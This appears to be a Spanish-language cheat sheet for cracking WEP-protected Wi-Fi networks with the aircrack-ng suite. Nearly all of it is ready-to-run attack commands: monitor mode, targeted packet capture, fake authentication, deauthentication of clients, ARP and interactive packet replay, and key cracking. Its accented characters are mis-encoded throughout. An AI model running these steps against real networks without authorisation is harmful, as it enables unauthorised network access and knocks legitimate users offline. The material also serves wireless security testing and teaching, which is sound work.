WEP
WEP, Wired Equivalent Privacy (WEP).
Habilitar modo monitor en tarjeta inal谩mbrica.
sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info
Captura de paquetes para identificar BSSID, ESSID y canal objetivo.
sudo airodump-ng <interface-mon>
Captura de paquetes de BSSID, ESSID y canal espec铆fico.
sudo airodump-ng <interface-mon> --bssid <BSSID> --essid <ESSID> -c <channel> -w <file-name> --output-format pcap
Obtener direcci贸n MAC de tarjeta inal谩mbrica en modo monitor.
macchanger --show <interface-mon>
Autenticaci贸n falsa.
sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <interface-mon-mac-address> <interface-mon>
Desautenticaci贸n de cliente(s).
# Desautenticaci贸n dirigida
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>
# Desautenticaci贸n broadcast
sudo aireplay-ng -0 1 -a <BSSID> <interface-mon>
ARP request replay.
# Autenticaci贸n falsa
sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <interface-mon-mac-address> <interface-mon>
# ARP request replay
sudo aireplay-ng -3 -b <BSSID> -h <interface-mon-mac-address> <interface-mon>
# Desautenticaci贸n de cliente
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>
Interactive packet replay.
# Autenticaci贸n falsa
sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <interface-mon-mac-address> <interface-mon>
# Interactive packet replay
sudo aireplay-ng -2 -b <BSSID> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 <interface-mon>
Cracking con Aircrack-ng.
aircrack-ng <file-name>.cap
脷ltima actualizaci贸n